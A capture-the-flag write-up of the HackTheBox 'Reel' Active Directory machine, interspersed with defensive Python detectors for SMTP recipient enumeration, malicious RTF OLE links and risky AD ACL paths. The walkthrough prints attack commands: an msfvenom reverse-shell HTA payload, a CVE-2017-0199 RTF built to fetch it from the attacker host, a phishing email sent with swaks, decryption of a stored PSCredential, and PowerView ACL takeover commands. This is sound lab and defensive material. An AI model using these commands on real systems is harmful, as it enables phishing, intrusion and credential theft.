HackTheBox-Reel

ARZ101
8 min read · Jan 9, 2022

Hello everyone, HTB Reel was a hard-difficulty Active Directory machine. Starting off with the nmap scan we have only three ports: FTP, SSH and SMTP. For an Active Directory machine this may seem odd, since a Kerberos service should be running, but it didn't really feel necessary here. Enumerating FTP, we can log in as the anonymous user and see a few files, one of which, a Word document, gives us an email address to which we send an attachment through SMTP following CVE-2017-0199. We get a reverse shell as the nico user, and in this user's Desktop folder we find a PSCredential in an XML file holding tom's credential, which we can decrypt because we own the XML. After decrypting it and getting the plaintext password, we can run SharpHound through IEX to bypass the execution policy for PowerShell scripts. Analysing the SharpHound data in BloodHound shows that tom has WriteOwner permission on the claire user, which lets us take ownership of the claire object and grant ourselves all rights on it to reset the password. Checking what we can do as claire, BloodHound shows that we have WriteDacl rights on the Backup_Admins group, which allows us to add users to this group, and as a member of this group we can access backup scripts in the Administrator's folder, which give us this account's password.

NMAP

PORT   STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_05-28-18 11:19PM <DIR> documents
| ftp-syst:
|_ SYST: Windows_NT
22/tcp open ssh OpenSSH 7.6 (protocol 2.0)
| ssh-hostkey:
| 2048 82:20:c3:bd:16:cb:a2:9c:88:87:1d:6c:15:59:ed:ed (RSA)
| 256 23:2b:b8:0a:8c:1c:f4:4d:8d:7e:5e:64:58:80:33:45 (ECDSA)
|_ 256 ac:8b:de:25:1d:b7:d8:38:38:9b:9c:16:bf:f6:3f:ed (ED25519)
25/tcp open smtp?
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, Kerberos, LDAPBindReq, LDAPSearchReq, LPDString, NULL, RPCCheck, SMBProgNeg, SSLSessionReq, TLSSessionReq, X11Probe:
| 220 Mail Service ready
| FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, RTSPRequest:
| 220 Mail Service ready
| sequence of commands
| sequence of commands
| Hello:
| 220 Mail Service ready
| EHLO Invalid domain address.
| Help:
| 220 Mail Service ready
| DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY\
| SIPOptions:
| 220 Mail Service ready
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands

PORT 21 (FTP)

FTP has anonymous login enabled, so we can easily log in

We see a folder named documents

And in the folder we can see three files

Opening the Applocker.docx file, it tells us about making rules for some scripts

Opening Windows Event Forwarding.docx warns us that it contains a macro, and the document fails to recover

Lastly the text file has this content in it

Please email me any rtf format procedures - I'll review and convert.
new format / converted documents will be saved here.

So this file pretty much tells us that we need to craft a phishing RTF document and send it by mail, but the question is: send it to whom? We don't have any SMB or LDAP service from which to enumerate users; only the SMTP service can enumerate users, but for that we need a username first. Running exiftool on the Word documents gives us a username

PORT 25 (SMTP)

To check whether it's a correct email address we could use VRFY, but that command is not allowed on this SMTP server

Instead we can use RCPT to check whether the email address is valid

And nico@megabank.com is a valid address to which we can send an email. Now, to deliver an RTF file, Windows had a vulnerability related to RTF that allows remote commands to be executed, which was assigned CVE-2017-0199
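From the defender's side, the RCPT probing described above leaves a distinctive trace: one client cycling through many distinct recipients and collecting 250/550 replies right after VRFY was refused. This is an added example (not code from the original post) that flags such clients in constructed SMTP log lines; the log format is an assumption.

```python
import re
from collections import defaultdict

# Constructed sample lines in an assumed "<time> <client ip> <verb> <mailbox> <reply>"
# format; they are not logs from the original machine.
SAMPLE_LOG = """\
2022-01-09T10:00:01 10.10.14.17 VRFY nico@megabank.com 502
2022-01-09T10:00:02 10.10.14.17 RCPT nico@megabank.com 250
2022-01-09T10:00:03 10.10.14.17 RCPT tom@megabank.com 250
2022-01-09T10:00:04 10.10.14.17 RCPT admin@megabank.com 550
2022-01-09T10:00:05 10.10.14.17 RCPT test@megabank.com 550
2022-01-09T10:00:06 10.10.14.17 RCPT guest@megabank.com 550
2022-01-09T10:00:07 10.10.14.17 RCPT backup@megabank.com 550
2022-01-09T10:00:20 10.10.14.99 RCPT nico@megabank.com 250
"""

LINE_RE = re.compile(r"^(?P<ts>\S+) (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) "
                     r"(?P<verb>[A-Z]{4}) (?P<mailbox>\S+) (?P<code>\d{3})$")

def parse_lines(log_text):
    """Yield one dict per line that matches the assumed format."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            yield m.groupdict()

def find_rcpt_enumeration(log_text, min_targets=3):
    """Return {client_ip: stats} for clients probing many distinct mailboxes.
    A normal sender addresses a few recipients; cycling through distinct RCPT
    addresses and collecting 250/550 answers is account enumeration, typically
    right after VRFY was refused with a 5xx reply."""
    per_ip = defaultdict(lambda: {"targets": set(), "valid": set(),
                                  "rejected": 0, "vrfy_refused": False})
    for rec in parse_lines(log_text):
        s = per_ip[rec["ip"]]
        if rec["verb"] == "VRFY" and rec["code"].startswith("5"):
            s["vrfy_refused"] = True
        elif rec["verb"] == "RCPT":
            s["targets"].add(rec["mailbox"])
            if rec["code"] == "250":
                s["valid"].add(rec["mailbox"])
            elif rec["code"].startswith("5"):
                s["rejected"] += 1
    return {ip: {"probed": len(s["targets"]), "rejected": s["rejected"],
                 "valid_accounts": sorted(s["valid"]),
                 "vrfy_refused": s["vrfy_refused"]}
            for ip, s in per_ip.items()
            if len(s["targets"]) >= min_targets and s["rejected"] > 0}
```

The same rule is easy to express as a mail-server alert: many distinct RCPT targets with rejections from one source is enumeration, and rate-limiting RCPT failures per client blunts it.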

http://rewtin.blogspot.com/2017/04/cve-2017-0199-practical-exploitation-poc.html

Foothold

Using an exploit from GitHub we can craft an RTF that includes a URL; the document fetches an HTA file from that URL and executes it on the system to give us a reverse shell. For that we first need to generate the HTA file using msfvenom

msfvenom -p windows/x64/shell_reverse_tcp LHOST=tun0 LPORT=2222 -f hta-psh > abc.hta
python cve-2017-0199_toolkit.py -M gen -t RTF -w Invoice.rtf -u http://10.10.14.17/abc.hta
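What a mail gateway or analyst can look for in such an attachment is the document shape CVE-2017-0199 relied on: an OLE object marked to auto-update on open whose object data carries a remote URL. This is an added detection example, not code from the post or the toolkit above; the sample RTF is constructed here around the URL used above and is only a stand-in for a real attachment.

```python
import re

# Control words that make Word refresh a linked OLE object as the file opens;
# combined with an \objdata blob pointing at a remote URL this is the document
# shape CVE-2017-0199 relied on.
LINK_WORDS = ("\\objautlink", "\\objupdate")
OBJDATA_RE = re.compile(r"\\objdata\s*([0-9a-fA-F\s]+)")
URL_RE = re.compile(r"https?://[\w.\-/:]+")

def decode_objdata(hex_blob):
    """Turn the whitespace-separated hex dump inside \\objdata back into bytes."""
    clean = re.sub(r"\s+", "", hex_blob)
    if len(clean) % 2:
        clean = clean[:-1]  # tolerate a truncated trailing nibble
    return bytes.fromhex(clean)

def find_remote_links(rtf_text):
    """Return URLs carried by auto-updating OLE objects in the RTF, or []."""
    if not all(word in rtf_text for word in LINK_WORDS):
        return []
    urls = set()
    for blob in OBJDATA_RE.findall(rtf_text):
        data = decode_objdata(blob)
        # Monikers store the target as ASCII or UTF-16LE; check both forms.
        for text in (data.decode("latin-1"), data.decode("utf-16-le", "ignore")):
            urls.update(URL_RE.findall(text))
    return sorted(urls)

# Constructed samples: a 12-byte OLE-style header prefix plus the URL from the
# walkthrough encoded as UTF-16LE, and a plain document with no objects.
_OBJ = bytes.fromhex("01050000020000000b000000") + \
    "http://10.10.14.17/abc.hta".encode("utf-16-le")
SAMPLE_RTF = (r"{\rtf1{\object\objautlink\objupdate\rsltpict{\*\objdata "
              + _OBJ.hex() + "}}}")
CLEAN_RTF = r"{\rtf1 Quarterly invoice, no embedded objects.}"
```

A hit here is a reason to quarantine the message; the same check can be run over the RTF files a drop folder like the FTP share above receives.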

Now, to send the mail with the attachment, I had difficulty figuring out how to send it; on Google everyone mentioned doing it through telnet by specifying the Content-Type and other headers, but I found a neat tool called swaks

http://www.jetmore.org/john/code/swaks/

So we run this to send an email to nico, after starting the Python server that hosts the HTA file

swaks --server 10.10.10.77 -f arz@htb.reel -t nico@megabank.com --attach Invoice.rtf

In nico's Desktop folder we can see a cred.xml file; reading it, there appears to be an encrypted password for Tom

Privilege Escalation (Tom)

Now here I ran into an issue: to decrypt this we need PowerShell, and when I ran powershell the reverse shell would just hang

So instead we can pass the command as an argument to powershell and decrypt the password for user Tom

powershell.exe -c "$file = Import-Clixml -Path cred.xml;$file.GetNetworkCredential().Password"

Now that we have credentials for the tom user we can log in with SSH

Checking which groups this user is in

In the Desktop directory we see a folder named AD Audit which already has a BloodHound folder in it

And from the text file it seems there is no path to Domain Admin

We can import and run PowerView commands, but I am just more comfortable using BloodHound; however, we can't actually import the SharpHound script from the machine

Privilege Escalation (Claire)

So we can bypass this by running the script in memory through IEX, which downloads the script and loads it into memory without writing it to disk

`Invoke-Bloodhound -CollectionMethod All -Domain HTB.LOCAL -ZipFileName loot.zip`

To transfer the result we can use impacket's smbserver to copy the zip file onto our machine

After it is transferred we can use the BloodHound GUI to see what we can abuse in AD

We have WriteOwner access on the claire object, so we can take ownership of it and grant ourselves All rights on it in order to reset the password

Set-DomainObjectOwner -Identity claire -OwnerIdentity tom -Verbose
Add-DomainObjectAcl -TargetIdentity claire -PrincipalIdentity tom -Rights All -Verbose

Privilege Escalation (Administrator)

Now, as Claire, we can see that we have WriteDacl on BACKUP_ADMINS

The abuse info shows that we can add users to this group

So logging back in as tom we see that we are a member of this group now

But it gets reverted quickly, so we need to be quick in navigating to the Administrator's folder, where we find some backup scripts, one of which, BackupScript.ps1, has the password for the administrator account

Having the password we can log in through SSH

Further, loading Mimikatz we can dump the SAM hashes
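The two findings above (tom's WriteOwner on claire, claire's WriteDacl on BACKUP_ADMINS) are exactly what an ACL audit should surface before anyone maps them in BloodHound. This added example, not code from the post, walks a constructed set of BloodHound-style (principal, right, object) edges and reports every non-admin principal with a control path to a high-value group; the allowlist of expected rights holders is an assumption.

```python
from collections import deque

# Rights that let the holder take over an object or grant itself more rights;
# MemberOf lets a path continue through a group the principal is already in.
CONTROL_RIGHTS = {"WriteOwner", "WriteDacl", "GenericAll", "GenericWrite",
                  "AddMember", "MemberOf"}
EXPECTED_HOLDERS = {"DOMAIN ADMINS", "ENTERPRISE ADMINS", "SYSTEM"}  # assumed allowlist

# Constructed (principal, right, object) edges in the shape BloodHound reports.
# Only the tom -> claire -> BACKUP_ADMINS relationships come from the
# walkthrough; the remaining edges are filler.
SAMPLE_ACES = [
    ("TOM", "WriteOwner", "CLAIRE"),
    ("CLAIRE", "WriteDacl", "BACKUP_ADMINS"),
    ("DOMAIN ADMINS", "GenericAll", "CLAIRE"),
    ("TOM", "MemberOf", "DOMAIN USERS"),
    ("NICO", "MemberOf", "DOMAIN USERS"),
    ("DOMAIN USERS", "ReadProperty", "BACKUP_ADMINS"),
]

def build_graph(aces):
    """Adjacency list keeping only edges that confer control."""
    graph = {}
    for principal, right, obj in aces:
        if right in CONTROL_RIGHTS:
            graph.setdefault(principal, []).append((right, obj))
    return graph

def control_path(aces, start, target):
    """Shortest chain of (principal, right, object) steps from start to target
    by breadth-first search over control edges; None if unreachable."""
    graph = build_graph(aces)
    queue, seen = deque([(start, [])]), {start}
    while queue:
        node, path = queue.popleft()
        for right, obj in graph.get(node, []):
            step = path + [(node, right, obj)]
            if obj == target:
                return step
            if obj not in seen:
                seen.add(obj)
                queue.append((obj, step))
    return None

def unexpected_controllers(aces, high_value):
    """Each principal outside the allowlist that can reach high_value, with its path."""
    principals = {p for p, _, _ in aces} - EXPECTED_HOLDERS - {high_value}
    paths = {p: control_path(aces, p, high_value) for p in principals}
    return {p: path for p, path in sorted(paths.items()) if path}
```

Every path returned is an ACE to remove or justify; the quick group-membership revert seen above is a cleanup job, not a fix, while the WriteOwner and WriteDacl entries remain.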
